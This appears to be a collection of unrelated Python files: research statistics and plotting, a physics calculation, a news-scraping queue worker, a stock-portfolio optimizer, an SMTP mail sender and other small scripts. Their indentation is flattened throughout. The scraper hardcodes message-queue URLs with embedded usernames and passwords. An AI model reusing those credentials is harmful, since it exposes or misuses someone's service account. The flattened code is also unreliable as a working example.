sns.boxplot(x='name', y='n_reduction', data=df_ntr, ax=ax)
ax.set_xlabel('')
ax.set_ylabel('Normalized Time Reduction' if tr ==
'10' else '') # Workaround
ax.set_title(f"Time Budget: {tr}%")
ax.set_xticklabels(textwrap.fill(x.get_text(), MAX_XTICK_WIDTH)
for x in ax.get_xticklabels())
best_idx = [i for i, x in enumerate(means) if x == max(means)]
if len(best_idx) == 1:
best_i = best_idx[0]
row[best_i + 1] = f"\\cellbold{{{row[best_i + 1]}}}"
else:
for best_i in best_idx:
row[best_i + 1] = f"\\cellgray{{{row[best_i + 1]}}}"
return row
def visualize_ntr(self):
stat_columns = ['TimeBudget'] + self.columns_metrics
df_stats = pd.DataFrame(columns=stat_columns)
# Total time spent in each Cycle
total_time_spent = self.df_system['duration'].sum()
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(int(8.3 * 3 * (len(policies) / 3)), 8))
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
df = self.datasets[df_k]
row = self._visualize_ntr(df, tr, ax, total_time_spent)
df_stats = df_stats.append(
pd.DataFrame([row], columns=stat_columns))
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/NTR.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
df_stats['Metric'] = 'NTR'
return df_stats
def _visualize_duration(self, df):
dd = df[['name', 'prioritization_time']]
# sort_df(dd)
self.print_mean(dd, 'prioritization_time', direction='min')
self.print_mean_latex(dd, 'prioritization_time')
def visualize_duration(self):
rewards = self._get_rewards()
for rw in rewards:
print(f"\n\n======{rw}======")
for df_k, tr in zip(self.datasets.keys(), self.sched_time_ratio_names):
print(f"\nTime Budget {tr}%")
df = self.datasets[df_k]
self._visualize_duration(df[df.reward_function == rw])
def _transpose_df(self, df, column='name'):
df_tras = df.copy()
df_tras.index = df_tras[column]
return df_tras.transpose()
def _rmse_calculation(self, df, column='fitness'):
def get_rmse_symbol(mean):
"""
very near if RMSE < 0.15
near if 0.15 <= RMSE < 0.23
reasonable if 0.23 <= RMSE < 0.30
far if 0.30 <= RMSE < 0.35
very far if 0.35 <= RMSE
"""
if mean < 0.15:
# very near
return "$\\bigstar$"
elif mean < 0.23:
# near
return "$\\blacktriangledown$"
elif mean < 0.30:
# reasonable
return "$\\triangledown$"
elif mean < 0.35:
# far
return "$\\vartriangle$"
else:
# very far
return "$\\blacktriangle$"
def get_mean_std_rmse(df_rmse, column, n_builds):
df_f = df_rmse.groupby(['experiment'], as_index=False).agg(
{column: lambda x: np.sqrt(sum(x) / n_builds)})
# Get column values and provide a beautiful output
mean, std = round(df_f[column].mean(), 4), round(
df_f[column].std(), 4)
return [mean, std, f"{mean:.4f} $\\pm$ {std:.3f} {get_rmse_symbol(mean)}".strip()]
def get_config_latex(row, best_rmse, contains_equivalent):
"""
Latex commands used:
- Best algorithm: \newcommand{\cellgray}[1]{\cellcolor{gray!30}{#1}}
- Equivalent to the best one: \newcommand{\cellbold}[1]{\cellcolor{gray!30}{\textbf{#1}}}
"""
if contains_equivalent and row['mean'] == best_rmse:
return f"\\cellgray{{{row['output']}}}"
if row['mean'] == best_rmse:
return f"\\cellbold{{{row['output']}}}"
return row['output']
columns = [column, 'experiment', 'step']
n_builds = len(df['step'].unique())
# Get only the required columns
df = df[['experiment', 'step', 'name', column]]
# Orderby to guarantee the right value
df.sort_values(by=['experiment', 'step'], inplace=True)
df_rmse = pd.DataFrame(
columns=['experiment', 'step', 'Deterministic'])
dt = df.loc[df['name'] == 'Deterministic', columns]
df_rmse['Deterministic'] = dt[column]
df_rmse['experiment'] = dt['experiment']
df_rmse['step'] = dt['step']
policies = list(self._get_policies())
policies.remove('Deterministic')
for pol in policies:
df_rmse[pol] = df.loc[df['name']
== pol, columns][column].tolist()
df_rmse = df_rmse.reset_index()
for pol in policies:
df_rmse[f'RMSE_{pol}'] = df_rmse.apply(lambda x: (x[pol] - x['Deterministic']) ** 2, axis=1)
df_rmse_rows = []
for pol in policies:
rmse = get_mean_std_rmse(df_rmse, f'RMSE_{pol}', n_builds)
df_rmse_rows.append([pol] + rmse)
df_rmse_results = pd.DataFrame(
df_rmse_rows, columns=['name', 'mean', 'std', 'output'])
best_rmse = df_rmse_results['mean'].min()
contains_equivalent = len(
df_rmse_results[df_rmse_results['mean'] == best_rmse]) > 1
df_rmse_results['latex_format'] = df_rmse_results.apply(
lambda row: get_config_latex(row, best_rmse, contains_equivalent), axis=1)
# Select the main information
rmse = df_rmse_results[['name', 'latex_format']]
# Return only the values
return self._transpose_df(rmse).values[1]
def rmse_calculation(self, column='fitness'):
policies = list(self._get_policies())
policies.remove('Deterministic')
rmse_cols = ['TimeBudget'] + policies
df_rmse = pd.DataFrame(columns=rmse_cols)
for df_k, tr in zip(self.datasets.keys(), self.sched_time_ratio_names):
df = self.datasets[df_k]
row = [tr] + list(self._rmse_calculation(df, column))
df_rmse = df_rmse.append(pd.DataFrame([row], columns=rmse_cols))
metric, ylabel = self._get_metric_ylabel(column)
df_rmse['Metric'] = 'RMSE_' + metric
return df_rmse
def _statistical_test_kruskal(self, df, ax, column):
if column == 'ttf':
df = df[df.ttf > 0]
if (len(df)) > 0:
# Get the mean of fitness in each experiment
x = df[['experiment', 'name', column]]
policies = self._get_policies()
diff_pol = list(set(policies) - set(x['name'].unique()))
x = x.groupby(['experiment', 'name'], as_index=False).agg(
{column: np.mean})
# Remove unnecessary columns
x = x[['name', column]]
mean, best = self.print_mean(x, column, 'min' if column in [
'ttf', 'prioritization_time'] else 'max')
mean['eff_symbol'] = " "
posthoc_df = None
all_equivalent = False
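            # The Kruskal-Wallis test below checks whether all policies share the same
            # distribution of per-experiment means; if it rejects (p < 0.05), a pairwise
            # post-hoc test plus the Vargha-Delaney effect size is used to tell which
            # policies actually differ from the best one.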
try:
k = kruskal_wallis(x, column, 'name')
kruskal, posthoc = k.apply(ax)
print(f"\n{kruskal}") # Kruskal results
all_equivalent = 'p-unc' not in kruskal.columns or kruskal[
'p-unc'][0] >= 0.05
if posthoc is not None:
print("\n--- POST-HOC TESTS ---")
print("\np-values:")
print(posthoc[0])
# Get the posthoc
df_eff = vargha_delaney.reduce(posthoc[1], best)
print(df_eff)
def get_eff_symbol(x, best, df_eff):
if x['name'] == best:
return "$\\bigstar$"
elif len(df_eff.loc[df_eff.compared_with == x['name'], 'effect_size_symbol'].values) > 0:
return df_eff.loc[df_eff.compared_with == x['name'], 'effect_size_symbol'].values[0]
else:
return df_eff.loc[df_eff.base == x['name'], 'effect_size_symbol'].values[0]
mean['eff_symbol'] = mean.apply(
lambda x: get_eff_symbol(x, best, df_eff), axis=1)
                    # Convert the post-hoc p-value matrix to an R data frame so that it
                    # can then be converted to a pandas DataFrame on the Python side
ro.r.assign('posthoc', posthoc[0])
ro.r('posthoc_table <- t(as.matrix(posthoc$p.value))')
ro.r('df_posthoc <- as.data.frame(t(posthoc_table))')
# Convert the dataframe from R to pandas
with localconverter(ro.default_converter + pandas2ri.converter):
posthoc_df = ro.conversion.rpy2py(ro.r('df_posthoc'))
except Exception as e:
print("\nError in statistical test:", exception_to_string(e))
            # Concatenate mean, std and effect-size symbol into a single display column
mean['avg_std_effect'] = mean.apply(
lambda row: f"{row['mean']:.4f} $\\pm$ {row['std']:.4f} {row['eff_symbol']}".strip(), axis=1)
def get_config_latex(row, best, posthoc_df, all_equivalent):
"""
Latex commands used:
- Best algorithm: \newcommand{\cellgray}[1]{\cellcolor{gray!30}{#1}}
- Equivalent to the best one: \newcommand{\cellbold}[1]{\cellcolor{gray!30}{\textbf{#1}}}
"""
current_name = row['name']
if all_equivalent:
return f"\\cellgray{{{row['avg_std_effect']}}}"
if row['name'] == best:
return f"\\cellbold{{{row['avg_std_effect']}}}"
is_equivalent = False
# If the posthoc was applied
if posthoc_df is not None:
if best in posthoc_df.columns and current_name in posthoc_df.index and not np.isnan(
posthoc_df.loc[current_name][best]):
# They are equivalent
is_equivalent = posthoc_df.loc[
current_name][best] >= 0.05
elif current_name in posthoc_df.columns and best in posthoc_df.index and not np.isnan(
posthoc_df.loc[best][current_name]):
# They are equivalent
is_equivalent = posthoc_df.loc[
best][current_name] >= 0.05
else:
raise Exception(
"Problem found when we tried to find the post-hoc p-value")
if is_equivalent:
return f"\\cellgray{{{row['avg_std_effect']}}}"
return row['avg_std_effect']
# Insert the latex commands
mean['latex_format'] = mean.apply(lambda row: get_config_latex(
row, best, posthoc_df, all_equivalent), axis=1)
# Select the main information
mean = mean[['name', 'latex_format']]
mean_trans = mean.copy()
mean_trans.index = mean['name']
mean_trans = mean_trans.transpose()
if len(diff_pol) > 0:
# We remove the value from the policies that do not have result
for dp in diff_pol:
mean_trans[dp] = '-'
# Return only the values
return mean_trans[self.columns_metrics].values[1]
else:
return ['-', '-', '-']
def statistical_test_kruskal(self, column='fitness'):
stat_columns = ['TimeBudget'] + self.columns_metrics
df_stats = pd.DataFrame(columns=stat_columns)
metric, ylabel = self._get_metric_ylabel(column)
print(
f"\n\n\n\n||||||||||||||||||||||||||||||| STATISTICAL TEST - KRUSKAL WALLIS - {metric} |||||||||||||||||||||||||||||||\n")
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(int(8.3 * 3 * (len(policies) / 3)), 8))
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
print(f"~~~~ Time Budget {tr}% ~~~~")
row = self._statistical_test_kruskal(
self.datasets[df_k], ax, column)
row = np.insert(row, 0, tr)
df_stats = df_stats.append(
pd.DataFrame([row], columns=stat_columns))
ax.set_title(f"Time Budget: {tr}%")
ax.set_ylabel(ylabel if tr == '10' else '') # Workaround
ax.set_xticklabels(textwrap.fill(x.get_text(), MAX_XTICK_WIDTH)
for x in ax.get_xticklabels())
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{metric}_Kruskal.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
df_stats['Metric'] = metric
return df_stats
|
# -*- coding: utf-8 -*-
execfile("initcctbx.py")
# Don't use the installed version
import os, sys
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from spectrocrunch.materials.compoundfromformula import compoundfromformula
from spectrocrunch.materials.mixture import mixture
from spectrocrunch.materials.types import fraction
import scipy.integrate as integrate
import scipy.optimize as optimize
import numpy as np
def test1():
compound1 = compoundfromformula("La2O3", 0, name="La2O3")
compound2 = compoundfromformula("SrO", 0, name="SrO")
compound3 = compoundfromformula("Co2O3", 0, name="Co2O3")
compound4 = compoundfromformula("Fe2O3", 0, name="Fe2O3")
m = mixture(
[compound1, compound2, compound3, compound4], [1, 1, 1, 1], fraction.mass
)
print (compound4.massfractions())
print ("")
elements = m.elemental_massfractions()
print ("")
for e in elements:
print (e, e.MM, elements[e])
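# capillary_transmission computes the transmission of a beam through a cylindrical
# capillary of radius R filled with a material of mass attenuation coefficient mu and
# density rho (scaled by the packing fraction), averaged over the beam cross-section:
#   T(R) = 1/(2R) * integral_{-R}^{+R} exp(-2*mu*rho*sqrt(R^2 - x^2)) dx
# capillary_transmission2 fixes R and varies the packing fraction instead.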
class capillary_transmission:
def __init__(self, mu, rho, packing=1.0):
self.mu = mu
self.rho = rho * packing
def __call__(self, R):
if R == 0:
return 1.0
else:
# return np.exp(-2.*R*self.mu*self.rho) # estimation
return (
integrate.quad(
lambda x: np.exp(-2 * self.mu * self.rho * np.sqrt(R * R - x * x)),
-R,
R,
)[0]
/ (2 * R)
)
class capillary_transmission2:
def __init__(self, mu, rho, R):
self.mu = mu
self.rho = rho
self.R = R
def __call__(self, packing):
return (
integrate.quad(
lambda x: np.exp(
-2 * self.mu * self.rho * packing * np.sqrt(self.R * self.R - x * x)
),
-self.R,
self.R,
)[0]
/ (2 * self.R)
)
class capillary_refine:
def __init__(self, mu, rho, T, packing):
self.o = capillary_transmission(mu, rho, packing=packing)
self.transmission = T
def __call__(self, R):
return self.o(R) - self.transmission
class capillary_refine2:
def __init__(self, mu, rho, T, R):
self.o = capillary_transmission2(mu, rho, R)
self.transmission = T
def __call__(self, R):
return self.o(R) - self.transmission
def test2():
compound1 = compoundfromformula("C18H30O2", 0.9291, name="linseedoil")
compound2 = compoundfromformula("Pb3C2O8H2", 6.8, name="hydrocerussite")
m = mixture([compound1, compound2], [0.5, 0.5], fraction.volume)
mu = m.mass_att_coeff(35.0)
# 60% transmission
T = 0.6
# flat sample
thickness = -np.log(T) / (mu * m.density) # cm
# capillary
# R = 30e-4 # cm
# packing = optimize.broyden2(capillary_refine2(mu,m.density,T,R),0.7)
packing = 1.0
R = optimize.broyden2(capillary_refine(mu, m.density, T, packing), [80e-4])[0] # cm
# 1-3 ug
mass = 1 * 1e-6 # g
volume = mass / m.density # cm^3
print "Mixture:"
print "density = {} g/cm^3".format(m.density)
print "mass.att. = {} cm^2/g".format(mu)
print "\nCapillary:"
print "R = {} um".format(R * 1e4)
print "packing = {} %".format(packing * 100)
print "h = {} mm (@ total mass = {} ug)".format(
volume / (np.pi * R * R) * 10, mass * 1e6
)
print "\nFlat sample:"
print "thickness = {} um".format(thickness * 1e4)
print "footprint = {} mm^2 (@ total mass = {} ug)".format(
volume / thickness * 1e4, mass * 1e6
)
if __name__ == "__main__":
test2()
|
import os
import sys
from newspaper import Article
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
sys.path.append(os.path.join(os.path.dirname(__file__), 'scrapers'))
import cnn_news_scraper
from cloudAMQP_client import CloudAMQPClient
DEDUPE_NEWS_TASK_QUEUE_URL = 'amqp://sspuqxlv:su5SdhMPn-x2lnKElijEbGxLEGpZxtRT@wasp.rmq.cloudamqp.com/sspuqxlv'
DEDUPE_NEWS_TASK_QUEUE_NAME = 'tap-news-dedupe-news-task-queue'
SCRAPE_NEWS_TASK_QUEUE_URL = "amqp://mcyrgohw:CB44sIsZxuz-IInG5a5ESFGrnP0iIda4@crane.rmq.cloudamqp.com/mcyrgohw"
SCRAPE_NEWS_TASK_QUEUE_NAME = "tap-news-scrape-news-task-queue"
SLEEP_TIME_IN_SECONDS = 5
dedupe_news_queue_client = CloudAMQPClient(DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME)
scrape_news_queue_client = CloudAMQPClient(SCRAPE_NEWS_TASK_QUEUE_URL, SCRAPE_NEWS_TASK_QUEUE_NAME)
def handle_message(msg):
if msg is None or not isinstance(msg, dict):
print 'message is broken'
return
task = msg
text = None
# if task['source'] == 'cnn':
# print 'scraping CNN news'
# text = cnn_news_scraper.extract_news(task['url'])
# else:
# print 'news source [%s] is not supported.' % task['source']
# task['text'] = text
article = Article(task['url'])
article.download()
article.parse()
# article.text is unicode, need to encode it to utf-8
task['text'] = article.text.encode('utf-8')
dedupe_news_queue_client.send_message(task)
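# Polling loop: pull one scrape task at a time from the scrape queue, download and parse
# the article, forward the enriched task to the dedupe queue, and sleep between polls so
# the worker does not busy-wait when the queue is empty.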
while True:
if scrape_news_queue_client is not None:
msg = scrape_news_queue_client.get_message()
if msg is not None:
try:
handle_message(msg)
except Exception as e:
print e
pass
scrape_news_queue_client.sleep(SLEEP_TIME_IN_SECONDS)
|
import FWCore.ParameterSet.Config as cms
process = cms.PSet()
process.fwliteInput = cms.PSet(
fileNames = cms.vstring('file:patTuple.root'), ## mandatory
maxEvents = cms.int32(100), ## optional
outputEvery = cms.uint32(10), ## optional
)
process.fwliteOutput = cms.PSet(
fileName = cms.string('analyzeFWLiteHistograms.root'), ## mandatory
)
process.btagAnalyzer = cms.PSet(
## input specific for this analyzer
Jets = cms.InputTag("cleanPatJets"),
bTagAlgo=cms.string('trackCountingHighEffBJetTags'),
bins=cms.uint32(100),
lowerbin=cms.double(0.),
upperbin=cms.double(10.)
)
process.jecAnalyzer = cms.PSet(
## input specific for this analyzer
Jets = cms.InputTag("cleanPatJets"),
jecLevel=cms.string("L2Relative"),
patJetCorrFactors= cms.string('patJetCorrFactors')
)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import FinanceDataReader as fdr
from pykrx import stock
import datetime
import requests
# from datetime import timedelta  # use timedelta for offsets measured in days/seconds/microseconds
from dateutil.relativedelta import relativedelta  # use relativedelta for offsets of months or years before/after a date
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
from pypfopt import plotting
import warnings
warnings.filterwarnings(action='ignore')
from Class_Strategies import Strategies
import csv
stock_dual = Strategies.getHoldingsList('KOSPI')
prices = Strategies.getCloseDatafromList(stock_dual, '2021-01-01')
dualmomentumlist = Strategies.DualMomentum(prices, lookback_period = 20, n_selection = len(stock_dual)//2)
# # print(dualmomentumlist)
#
# with open('dualmomentumlist.csv','w') as file:
# write = csv.writer(file)
# write.writerow(dualmomentumlist)
def Dual_sharpe():
    # Stock names and ticker codes
kospi_temp = fdr.StockListing('KOSPI')[['Symbol', 'Name']]
kosdaq_temp = fdr.StockListing('KOSDAQ')[['Symbol', 'Name']]
code_name_dict = pd.concat([kospi_temp, kosdaq_temp])
code_name_dict = code_name_dict.set_index('Symbol').to_dict().get('Name') # {'095570': 'AJ네트웍스',
# assets = pd.read_csv('dualmomentumlist.csv') #np.array(dualmomentumlist)
# print(assets)
start_date = datetime.datetime.today() - relativedelta(years=3)
start_date = start_date.strftime('%Y%m%d')
today = datetime.datetime.today().strftime("%Y%m%d")
end_date = today
df = pd.DataFrame()
    ##################### Added here: filter out KRX administrative issues ######################
    # Code to remove stocks designated as administrative issues
# temp_assets = pd.read_csv('dualmomentumlist.csv')
temp_assets = np.array(dualmomentumlist)
# print(temp_assets)
krx_adm = fdr.StockListing('KRX-ADMINISTRATIVE')
# print(krx_adm)
    # Ticker codes of the KRX administrative issues
under_ctrl = krx_adm['Symbol'].values
# print(under_ctrl)
assets = np.setdiff1d(temp_assets, under_ctrl)
# print(assets)
for s in assets:
df[s] = fdr.DataReader(s, start_date, end_date)['Close']
# drop null
dfnull = df.dropna(axis=1)
    # Expected returns and covariance of the returns
mu = expected_returns.mean_historical_return(dfnull)
S = risk_models.sample_cov(dfnull)
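    # The max-Sharpe optimization below searches for weights w (summing to 1) that maximize
    # the portfolio's expected excess return per unit of volatility, (w.mu - r_f) / sqrt(w' S w);
    # pypfopt solves this with the SCS solver configured below.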
# print(plotting.plot_covariance(S))
    # Portfolio optimization (max Sharpe ratio) - surging stocks
ef = EfficientFrontier(mu, S, solver="SCS")
weights = ef.max_sharpe()
cleaned_weights = ef.clean_weights()
print(ef.portfolio_performance(verbose=True))
one_million = 1000000
portfolio_val = 15 * one_million
latest_prices = get_latest_prices(dfnull)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio(verbose=False)
rmse = da._allocation_rmse_error(verbose=False)
    # Actual investment amount for each stock
inv_total_price = {}
for i in allocation.keys():
inv_total_price[i] = latest_prices.loc[i] * allocation[i]
inv_total_price
    # Total investment amount
investment = 0
for i in inv_total_price.values():
investment += i
print(investment)
    # Actual investment weight for each stock
inv_total_weight = {}
for i in allocation.keys():
inv_total_weight[i] = inv_total_price[i] / investment
inv_total_weight
    # Sum of the investment weights
investment_w = 0
for i in inv_total_weight.values():
investment_w += i
print(investment_w)
    # Collect the values to report as lists
    name_list = []  # stock names (company names)
    total_price_stock = []  # actual investment amount for each stock
    total_weight_stock = []  # actual investment weight for each stock
    for i in allocation.keys():  # i = ticker code of a stock allocated to the portfolio
name_list.append(code_name_dict.get(i))
total_price_stock.append(inv_total_price.get(i))
total_weight_stock.append(inv_total_weight.get(i))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
discrete_allocation_list.append(allocation.get(symbol))
print(discrete_allocation_list)
portfolio_df = pd.DataFrame(columns=['종목명', '종목코드', '수량(주)', '투자금액(원)', '투자비중'])
portfolio_df['종목명'] = name_list
portfolio_df['종목코드'] = allocation
portfolio_df['수량(주)'] = discrete_allocation_list
portfolio_df['투자금액(원)'] = total_price_stock
portfolio_df['투자비중'] = total_weight_stock
portfolio_df_sorted = portfolio_df.sort_values('투자비중', ascending=False)
portfolio_df_sorted = portfolio_df_sorted.reset_index(drop=True)
    # Number of shares of each stock in the portfolio optimized for the given investment amount
portfolio_df_sorted.loc["합계", 2:] = portfolio_df_sorted.sum()
    ################# Comparison with KOSPI ####################
    # Multiply each stock's daily closing price by its weight
for i, weight in cleaned_weights.items():
dfnull[i] = dfnull[i] * weight
    # Store the daily sum of (close * weight) in the Port column
dfnull['Port'] = dfnull.sum(axis=1)
    # Store the day-over-day change (return) of the portfolio value in a DataFrame named portfolio
portfolio = dfnull[['Port']].pct_change()
    # Load the KOSPI index
kospi = fdr.DataReader('KS11', start_date, end_date)[['Close']]
    # Compute the day-over-day change (return) of the KOSPI index
    # return = (today's price - previous day's price) / previous day's price
    # e.g. the return for 7/20 = (price on 7/20 - price on 7/19) / price on 7/19
kospi_pct = kospi.pct_change()
    # Join the KOSPI and portfolio returns
result = kospi_pct.join(portfolio)
    # Set the first row to 0 (replace the NaN values with 0)
result.iloc[0] = 0
    # Rename the columns
result.columns = ['KOSPI', 'PORTFOLIO']
    # Starting from 1, compound the daily returns into a cumulative wealth index
wealth = (1 + result).cumprod()
    # Visualize and compare the cumulative return trends of the portfolio and the KOSPI index
    # matplotlib.pyplot stylesheet setting
plt.style.use('fivethirtyeight')
plt.figure(figsize=(18, 5))
plt.plot(wealth.index, wealth.KOSPI, 'r', label='KOSPI')
plt.plot(wealth.index, wealth.PORTFOLIO, 'b', label="PORTFOLIO(Dual Momentum)")
plt.grid(True)
plt.title('Return Trend')
plt.xlabel('Date', fontsize=18, labelpad=7)
plt.ylabel('Return', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.savefig('Dual_sharpe_return.png', dpi=100)
plt.show()
    # Compare the volatility (daily returns)
plt.figure(figsize=(18, 10))
plt.subplot(2, 1, 1)
plt.title('Volatility Trend')
plt.plot(result.index, result.KOSPI, 'r', label='KOSPI')
plt.yticks([-0.15, -0.10, -0.05, 0.00, 0.05, 0.10, 0.15])
plt.grid(True)
plt.ylabel('Volatility', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.subplot(2, 1, 2)
plt.title('Volatility Trend')
    plt.plot(result.index, result.PORTFOLIO, 'b', label="PORTFOLIO(Dual Momentum)")
# plt.yticks([-0.15, -0.10, -0.05, 0.00, 0.05, 0.10, 0.15])
plt.ylabel('Volatility', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.grid(True)
plt.savefig('Dual_sharpe_votality.png', dpi=100)
plt.show()
    # print(portfolio_df_sorted)  # printing the DataFrame takes a while
print('----- Dual Momentum sharpe portfolio performance -----')
# Show Funds Remaining
print('Funds Remaining: ', leftover, ' KRW')
# Show Portfolio performance
print(ef.portfolio_performance(verbose=True))
|
"""
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/beginners
"""
# Directives needed by tensorFlow
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Some misc. libraries that are useful
import keras.backend as K
from keras.models import load_model
import numpy as np
from matplotlib import pyplot
from tensorflow.examples.tutorials.mnist import input_data
import Util.ML_Utils as utils
# Some misc. libraries that are useful
import os
import sys
import time
import math
# Let's print out the versions of python, tensorFlow and keras
utils.print_lib_versions()
# Import data once for all runs
mnist = input_data.read_data_sets(utils.PATH_TO_DATA, one_hot=True)
testCount = 0
data = []
dt = np.dtype([('name', np.unicode_, 72), ('loss', np.float64), ('accuracy', np.float64)])
path = ('{0}3/').format(utils.PATH_TO_TRAINED_MODELS)
for filename in os.listdir(path):
print('---------{}---------'.format(filename))
model = load_model(path+filename)
score = model.evaluate(mnist.test.images, mnist.test.labels, verbose=0)
s = "Test Loss:{0:.4f} Test Accuracy{1:.4f}".format(score[0], score[1])
data.append((filename, score[0], -1*score[1]))
testCount+=1
if(testCount > 99) :
break
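# Accuracy was stored negated above so that sorting ascending by the 'accuracy' field
# ranks the most accurate model first.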
l = np.array(data, dtype=dt)
sortedData=np.sort(l, order='accuracy')
print('########################')
print(type(l))
print(l.shape)
print(l.dtype)
print(sortedData)
|
# Lotto: highest and lowest possible rank
def solution(lottos, win_nums):
answer = []
    # rank when 0, 1, ..., 6 numbers match
rank = [6,6,5,4,3,2,1]
    # counters for the winning numbers
count_lottos = {}
count_win = {}
count = 0
    # guard against the case where the ticket contains no 0 (hidden number)
count_lottos[0] = 0
    # count the winning numbers
for num in win_nums:
count_lottos[num] = 0
count_win[num] = 1
    # count the numbers on the ticket
for num in lottos:
try:count_lottos[num] += 1
except:count_lottos[num] = 1
    # compute the rank
for num in win_nums:
if count_lottos[num] == count_win[num]:
count += 1
    # maximum number of matches -> best rank
answer.append(rank[count+count_lottos[0]])
    # minimum number of matches -> worst rank
answer.append(rank[count])
return answer
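# Quick sanity check, assuming the example from the original problem statement:
#   solution([44, 1, 0, 0, 31, 25], [31, 10, 45, 1, 6, 19]) returns [3, 5]
# (two confirmed matches plus two hidden (0) entries give a best rank of 3 and a worst rank of 5).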
"""
Test 1  〉 Passed (0.01ms, 10.3MB)
Test 2  〉 Passed (0.01ms, 10.2MB)
Test 3  〉 Passed (0.01ms, 10.1MB)
Test 4  〉 Passed (0.01ms, 10.1MB)
Test 5  〉 Passed (0.01ms, 10.3MB)
Test 6  〉 Passed (0.01ms, 10.2MB)
Test 7  〉 Passed (0.01ms, 10.2MB)
Test 8  〉 Passed (0.01ms, 10.3MB)
Test 9  〉 Passed (0.01ms, 10.2MB)
Test 10 〉 Passed (0.01ms, 10.2MB)
Test 11 〉 Passed (0.01ms, 10.1MB)
Test 12 〉 Passed (0.01ms, 10.2MB)
Test 13 〉 Passed (0.01ms, 10.2MB)
Test 14 〉 Passed (0.01ms, 10.2MB)
Test 15 〉 Passed (0.01ms, 10.3MB)
"""
|
from aocd import data
from aoc.utils import rows
import re
from functools import partial
rules = {}
for row in rows(data):
if ":" in row:
id_, rule = re.match(r"(\d*): (.*)", row).groups()
rules[int(id_)] = rule
messages = [row for row in rows(data) if ":" not in row and row != ""]
max_recursion_depth = max(map(len, messages))
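# Expanding a rule into a regex recurses through its sub-rules; with the recursive part-2
# rules (8 and 11) the expansion is cut off once the recursion depth exceeds the length of
# the longest message, since each level has to match at least one character and a deeper
# expansion could therefore never match.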
def regex_rule_from_match(match: re.Match, depth):
if depth > max_recursion_depth:
return ""
return regex_for_rule(rules[int(match.group())], depth=depth + 1)
def regex_for_rule(rule, depth=1):
if match := re.match(r'"(.)"', rule):
return match.groups()[0]
regex_rule_from_match_with_depth = partial(regex_rule_from_match, depth=depth)
regex = re.sub(r"\b\d+\b", regex_rule_from_match_with_depth, rule)
return f"({regex.replace(' ', '')})"
def count_messages_that_match_rule_0():
pattern = re.compile(regex_for_rule("^" + rules[0] + "$"))
return len([message for message in messages if re.match(pattern, message)])
print(count_messages_that_match_rule_0())
rules[8] = "42 | 42 8"
rules[11] = "42 31 | 42 11 31"
print(count_messages_that_match_rule_0())
|
# Config
import json
import pathlib
# Read config.json, looking two directory levels up first and falling back to three levels up
try:
path_cfg = pathlib.Path(
pathlib.Path.cwd()).parents[1].joinpath("config.json")
with open(path_cfg, "r") as _file:
settings = json.load(_file)
except:
path_cfg = pathlib.Path(
pathlib.Path.cwd()).parents[2].joinpath("config.json")
with open(path_cfg, "r") as _file:
settings = json.load(_file)
|
import smtplib
import logging
from functools import wraps
from email.header import Header
from email.mime.text import MIMEText
class SendEmailRetryTimeout(Exception):
pass
def error_retry(func):
@wraps(func)
def warps_func(*args, **kwargs):
for i in range(3):
try:
rlt = func(*args, **kwargs)
except Exception as e:
logging.exception(e)
logging.warning("Retry Func.%s, [%s]", func.__name__, i)
else:
break
else:
raise SendEmailRetryTimeout("Function retry failed.")
return rlt
return warps_func
def get_smtp_server(sender):
smtp_server = {
"hotmail": "smtp-mail.outlook.com",
"gmail": "smtp.gmail.com"
}
smtp_srv = None
for k, v in smtp_server.items():
if k in sender:
smtp_srv = v
break
else:
raise ValueError(f"Invalid Email Address [{sender}]")
logging.debug("Used SMTP server -> %s", smtp_srv)
return smtp_srv
@error_retry
def mail_sender(sender, sender_pwd, recv_email, mesg_contents, subject, msg_type):
""" SMTP send e-mail with smtp server "smtp.live.com"
Args:
send_email: sender email username.
send_pwd: sender email password.
recv_email: receiver email address.
mesg_text: email message contents.
subject: subject title.
subtype: subtype can be plain, html...etc.
"""
logging.debug("Send Mail by -> %s", sender)
logging.debug("Send Email to -> %s", recv_email)
smtp_srv = get_smtp_server(sender)
message = MIMEText(mesg_contents, msg_type, "utf-8")
message["From"] = Header(sender)
message["Subject"] = Header(subject)
server = smtplib.SMTP(smtp_srv, 587, timeout=30)
server.ehlo()
server.starttls()
server.ehlo()
server.login(sender, sender_pwd)
server.sendmail(sender, recv_email, message.as_string())
server.quit()
logging.info("Send mail successful!")
|
import inspect
import json
import os
from ctypes.util import find_library
from ctypes import *
from functools import wraps
from queue import Queue
from threading import Thread
from bot.custom import errors
from . import td_api
threads: list = list()
def run_async(func):
@wraps(func)
def async_func(*ar, **kw):
queue = Queue()
func_hl = Thread(target=func, args=ar, kwargs=kw)
threads.append(func_hl)
func_hl.start()
func_hl.join()
if not queue.empty():
return queue.get()
return func_hl
return func
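# NOTE: as written, run_async appears to return the original function unchanged, so
# async_func above is never used and decorated callables keep running synchronously on
# the caller's thread.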
def on_event(event: td_api.Update):
@run_async
def decorator(func):
add_event_handler(func, event)
return func
return decorator
handlers = {}
def add_event_handler(callback, event: td_api.Update):
